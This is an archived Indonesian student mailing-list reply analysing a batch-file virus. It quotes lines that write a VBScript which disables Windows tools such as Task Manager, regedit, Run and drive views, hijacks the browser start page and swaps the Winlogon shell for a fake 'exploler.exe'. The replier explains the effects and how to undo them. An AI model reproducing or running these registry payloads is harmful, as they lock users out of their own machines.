Re: [ MiteK-L ] Virus Source Code ?

Mon, 19 Feb 2007 19:30:40 -0800 

Assalaamu`alaykum wa Rahmatullaahi wa Barakaatuh

Segala Pujian hanya milik Allaah Subhanahu wa Ta'ala yang telah menciptakan
segala sesuatu. Shalawat selalu tercurah kepada Rasulullaah salallaahu
'alayhi wa sallam, beserta seluruh ummatnya illa yaumid-diyn. Semoga
keselamatan bagi yang mengikuti petunjuk yang benar.

Yep, ini file BAT yang dipake untuk mroduksi pirus. (Aku nebak ajah, soale
kaga ngeh ma VBScript)
Hm... Coba kita liat baris no 13 - 23

> 13. echo 
> WshShell.RegWrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun",
> "1?, "REG_DWORD">>c:\windows\gila.vbs
> 14. echo 
> WshShell.RegWrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrives",
> "29?, "REG_DWORD">>c:\windows\gila.vbs
> 15. echo 
> WshShell.RegWrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewOnDrive",
> "29?, "REG_DWORD">>c:\windows\gila.vbs
> 16. echo 
> WshShell.RegWrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\system\DisableRegistryTools",
> "1?, "REG_DWORD">>c:\windows\gila.vbs
> 17. echo 
> WshShell.RegWrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions",
> "1?, "REG_DWORD">>c:\windows\gila.vbs
> 18. echo 
> WshShell.RegWrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind",
> "1?, "REG_DWORD">>c:\windows\gila.vbs
> 19. echo 
> WshShell.RegWrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\system\DisableTaskMgr",
> "1?, "REG_DWORD">>c:\windows\gila.vbs
> 20. echo WshShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Internet
> Explorer\Main\Start Page", "http://fanaticanz.blogspot.com";,
> "REG_SZ">>c:\windows\gila.vbs
> 21. echo WshShell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
> NT\CurrentVersion\Winlogon\Shell", "Explorer.exe C:\WINDOWS\exploler.exe",
> "REG_SZ">>c:\windows\gila.vbs
> 22. echo WshShell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
> NT\CurrentVersion\RegisteredOrganization", "rastaman",
> "REG_SZ">>c:\windows\gila.vbs
> 23. echo WshShell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
> NT\CurrentVersion\RegisteredOwner", "fanatiCanz",
> "REG_SZ">>c:\windows\gila.vbs
>

ntu baris-baris ditulis sebagai badan virus, yang kalo diperhatiin, kaga
ngerusak apah-apah kok, cuman ngeblokir beberapa fungsi Windows (run,
regedit, folder options, task manager dan lain-lain). Kaga ngerusak sama
sekali. Silahken bikin file BAT lagi yang isinya ngebalik fungsi yang
ditulis dibaris 13 - 23 (kalo udah kenak lho).

Cuman ada satu masalah, yang cukup genting, yaitu disitu ditulis
e_x_p_l_o_l_e_r_._e_x_e, aku belum nyobak kalo file shell windows ngga
ditemuin wektu Windows booting, karena file shell aseli Windows
e_x_p_l_o_r_e_r_._e_x_e. sepertinya begitu masup Windows, layar akan
b_l_a_n_k. Kalo udah gini ya... install ulang, tindih (replace) Windows yang
aktip terinstall. Maka shell Windows akan balik ke e_x_p_l_o_r_e_r_._e_x_e
(seharusnya :-รพ), baru file BAT yang dipake untuk ngebalik proses yang
dibikin oleh g_i_l_a_._v_b_s bisa dijalanin


Jika ada yang benar dari yang aku sampaikan itu sesunggunya dari Allaah Azza
wa Jalla, dan jika ada kesalahan kutulis, itu semata dari aku.

Wassalaamu`alaykum wa Rahmatullaahi wa Barakaatuh


-- 
-----------------------------------------
El Harun Affandy
Jl. Ade Irma Suryani II / 509
Malang 65119
0341.70.90.256
http://friendster.com/elharun
-----------------------------------------
Keliru kalau dikatakan bahwa u_a_n_g yang membuat Tuhan menjadi baik.


[Non-text portions of this message have been removed]



================> HAPUS IKLAN DIATAS DAN FOOTER INI JIKA ME-REPLY 
<================
Posting   : [email protected]
Archive   : http://www.mail-archive.com/[email protected]/
                www.mitek.unibraw.ac.id || himamitek.brawijaya.ac.id
************************************************************************************
 
Yahoo! Groups Links

<*> To visit your group on the web, go to:
    http://groups.yahoo.com/group/mitek/

<*> Your email settings:
    Individual Email | Traditional

<*> To change settings online go to:
    http://groups.yahoo.com/group/mitek/join
    (Yahoo! ID required)

<*> To change settings via email:
    mailto:[EMAIL PROTECTED] 
    mailto:[EMAIL PROTECTED]

<*> To unsubscribe from this group, send an email to:
    [EMAIL PROTECTED]

<*> Your use of Yahoo! Groups is subject to:
    http://docs.yahoo.com/info/terms/

Kirim email ke